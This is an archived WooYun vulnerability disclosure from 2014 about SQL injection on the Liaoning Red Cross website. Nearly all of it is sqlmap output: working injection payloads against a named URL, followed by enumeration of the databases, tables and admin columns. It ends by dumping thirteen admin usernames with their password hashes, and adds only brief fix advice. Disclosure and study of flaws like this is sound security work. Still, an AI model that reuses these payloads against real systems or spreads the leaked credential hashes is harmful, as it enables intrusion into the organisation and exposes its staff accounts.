乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-21: 细节已通知厂商并且等待厂商处理中 2014-10-25: 厂商已经确认,细节仅向厂商公开 2014-11-04: 细节向核心白帽子及相关领域专家公开 2014-11-14: 细节向普通白帽子公开 2014-11-24: 细节向实习白帽子公开 2014-12-05: 细节向公众公开
辽宁省红十字会官网存在sql注入漏洞,顺带求个码
www.lnredcross.org.cn/web/content.asp?id=46&articleid=1006存在注入漏洞的参数为:articleid直接跑程序
sqlmap identified the following injection points with a total of 19 HTTP(s) requests:---Place: GETParameter: articleid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=46&articleid=1006 AND 9983=9983 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))---[14:56:14] [INFO] testing Microsoft SQL Server[14:56:14] [INFO] confirming Microsoft SQL Server[14:56:15] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[14:56:15] [INFO] fetching database names[14:56:16] [INFO] the SQL query used returns 9 entries[14:56:16] [INFO] retrieved: hongshiziyimai[14:56:16] [INFO] retrieved: jijinhui[14:56:17] [INFO] retrieved: lnredcross[14:56:17] [INFO] retrieved: master[14:56:20] [INFO] retrieved: model[14:56:20] [INFO] retrieved: msdb[14:56:20] [INFO] retrieved: Northwind[14:56:24] [INFO] retrieved: pubs[14:56:27] [INFO] retrieved: tempdbavailable databases [9]:[*] hongshiziyimai[*] jijinhui[*] lnredcross[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: articleid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=46&articleid=1006 AND 9983=9983 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))---[15:01:12] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[15:01:12] [INFO] fetching tables for database 'lnredcross'[15:01:21] [INFO] the SQL query used returns 35 entries[15:01:21] [INFO] retrieved: dbo.D99_Tmp[15:01:22] [INFO] retrieved: dbo.dtproperties[15:01:22] [INFO] retrieved: dbo.NC_Account[15:01:22] [INFO] retrieved: dbo.NC_Adboard[15:01:26] [INFO] retrieved: dbo.NC_AddMoney[15:01:26] [INFO] retrieved: dbo.NC_Adlist[15:01:26] [INFO] retrieved: dbo.NC_Admin[15:01:27] [INFO] retrieved: dbo.NC_Announce[15:01:27] [INFO] retrieved: dbo.NC_Article[15:01:27] [INFO] retrieved: dbo.NC_Card[15:01:28] [INFO] retrieved: dbo.NC_Channel[15:01:30] [INFO] retrieved: dbo.NC_Classify[15:01:30] [INFO] retrieved: dbo.NC_Comment[15:01:30] [INFO] retrieved: dbo.NC_Config[15:01:31] [INFO] retrieved: dbo.NC_Confirm[15:01:31] [INFO] retrieved: dbo.NC_DownAddress[15:01:31] [INFO] retrieved: dbo.NC_DownServer[15:01:32] [INFO] retrieved: dbo.NC_Favorite[15:01:32] [INFO] retrieved: dbo.NC_FlashList[15:01:35] [INFO] retrieved: dbo.NC_Friend[15:01:36] [INFO] retrieved: dbo.NC_GuestBook[15:01:36] [INFO] retrieved: dbo.NC_GuestReply[15:01:36] [INFO] retrieved: dbo.NC_Link[15:01:37] [INFO] retrieved: dbo.NC_Message[15:01:37] [INFO] retrieved: dbo.NC_Online[15:01:37] [INFO] retrieved: dbo.NC_Paymode[15:01:38] [INFO] retrieved: dbo.NC_ScriptFile[15:01:38] [INFO] retrieved: dbo.NC_SoftList[15:01:38] [INFO] retrieved: dbo.NC_Special[15:01:39] [INFO] retrieved: dbo.NC_Template[15:01:48] [INFO] retrieved: dbo.NC_User[15:01:48] [INFO] retrieved: dbo.NC_UserGroup[15:01:48] [INFO] retrieved: dbo.NC_Vote[15:01:49] [INFO] retrieved: dbo.sysconstraints[15:01:53] [INFO] retrieved: dbo.syssegmentsDatabase: lnredcross[35 tables]+--------------------+| dbo.D99_Tmp || dbo.NC_Account || dbo.NC_Adboard || dbo.NC_AddMoney || dbo.NC_Adlist || dbo.NC_Admin || dbo.NC_Announce || dbo.NC_Article || dbo.NC_Card || dbo.NC_Channel || dbo.NC_Classify || dbo.NC_Comment || dbo.NC_Config || dbo.NC_Confirm || dbo.NC_DownAddress || dbo.NC_DownServer || dbo.NC_Favorite || dbo.NC_FlashList || dbo.NC_Friend || dbo.NC_GuestBook || dbo.NC_GuestReply || dbo.NC_Link || dbo.NC_Message || dbo.NC_Online || dbo.NC_Paymode || dbo.NC_ScriptFile || dbo.NC_SoftList || dbo.NC_Special || dbo.NC_Template || dbo.NC_User || dbo.NC_UserGroup || dbo.NC_Vote || dbo.dtproperties || dbo.sysconstraints || dbo.syssegments |+--------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: articleid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=46&articleid=1006 AND 9983=9983 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))---[15:05:00] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[15:05:00] [INFO] fetching columns for table 'dbo.NC_Admin' on database 'lnredcross'[15:05:01] [INFO] the SQL query used returns 11 entries[15:05:01] [INFO] retrieved: Adminflag[15:05:03] [INFO] retrieved: int[15:05:03] [INFO] retrieved: AdminGrade[15:05:04] [INFO] retrieved: int[15:05:04] [INFO] retrieved: id[15:05:04] [INFO] retrieved: int[15:05:05] [INFO] retrieved: isAloneLogin[15:05:05] [INFO] retrieved: nvarchar[15:05:05] [INFO] retrieved: isLock[15:05:06] [INFO] retrieved: nvarchar[15:05:06] [INFO] retrieved: Loginip[15:05:06] [INFO] retrieved: nvarchar[15:05:07] [INFO] retrieved: LoginTime[15:05:07] [INFO] retrieved: nvarchar[15:05:07] [INFO] retrieved: password[15:05:12] [INFO] retrieved: nvarchar[15:05:13] [INFO] retrieved: RandomCode[15:05:13] [INFO] retrieved: nvarchar[15:05:15] [INFO] retrieved: status[15:05:16] [INFO] retrieved: nvarchar[15:05:16] [INFO] retrieved: username[15:05:16] [INFO] retrieved: nvarcharDatabase: lnredcrossTable: dbo.NC_Admin[11 columns]+--------------+----------+| Column | Type |+--------------+----------+| Adminflag | int || AdminGrade | int || id | int || isAloneLogin | nvarchar || isLock | nvarchar || Loginip | nvarchar || LoginTime | nvarchar || password | nvarchar || RandomCode | nvarchar || status | nvarchar || username | nvarchar |+--------------+----------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: articleid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=46&articleid=1006 AND 9983=9983 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))---[15:06:59] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[15:06:59] [INFO] fetching columns 'username, password' entries for table 'dbo.NC_Admin' on database 'lnredcross'[15:06:59] [INFO] retrieved: 13[15:06:59] [INFO] fetching number of distinct values for column 'username'[15:07:00] [INFO] retrieved: 13[15:07:00] [INFO] using column 'username' as a pivot for retrieving row data[15:07:00] [INFO] retrieved: 123[15:07:01] [INFO] retrieved: ac59075b964b0715[15:07:01] [INFO] retrieved: admin[15:07:02] [INFO] retrieved: 06536de9f5104260[15:07:02] [INFO] retrieved: asd[15:07:02] [INFO] retrieved: f44f4964e6c998de[15:07:02] [INFO] retrieved: bangongshi[15:07:39] [INFO] retrieved: 965eb72c92a549dd[15:07:39] [INFO] retrieved: dingdong[15:07:49] [INFO] retrieved: 8ad9902aecba32e2[15:07:49] [INFO] retrieved: ganxibao[15:07:49] [INFO] retrieved: 2e2594b46e526824[15:07:50] [INFO] retrieved: gwh[15:07:50] [INFO] retrieved: 9443e0d88214175f[15:08:11] [INFO] retrieved: machi[15:08:11] [INFO] retrieved: 2b0f6f5eae91475d[15:08:18] [INFO] retrieved: neibuzhuanlan[15:08:20] [INFO] retrieved: d12b9eccf90f9873[15:08:20] [INFO] retrieved: rctest[15:08:21] [INFO] retrieved: aa4949bf181436f2[15:08:21] [INFO] retrieved: xiangmuban[15:08:21] [INFO] retrieved: 197cca949bdb9c6d[15:08:25] [INFO] retrieved: zhenjibu[15:08:25] [INFO] retrieved: e69785d9338da63f[15:08:25] [INFO] retrieved: zuxuanbu[15:08:26] [INFO] retrieved: 965eb72c92a549ddrecognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] NDatabase: lnredcrossTable: dbo.NC_Admin[13 entries]+------------------+---------------+| password | username |+------------------+---------------+| ac59075b964b0715 | 123 || 06536de9f5104260 | admin || f44f4964e6c998de | asd || 965eb72c92a549dd | bangongshi || 8ad9902aecba32e2 | dingdong || 2e2594b46e526824 | ganxibao || 9443e0d88214175f | gwh || 2b0f6f5eae91475d | machi || d12b9eccf90f9873 | neibuzhuanlan || aa4949bf181436f2 | rctest || 197cca949bdb9c6d | xiangmuban || e69785d9338da63f | zhenjibu || 965eb72c92a549dd | zuxuanbu |+------------------+---------------+
加强过滤吧
危害等级:高
漏洞Rank:10
确认时间:2014-10-25 23:44
暂无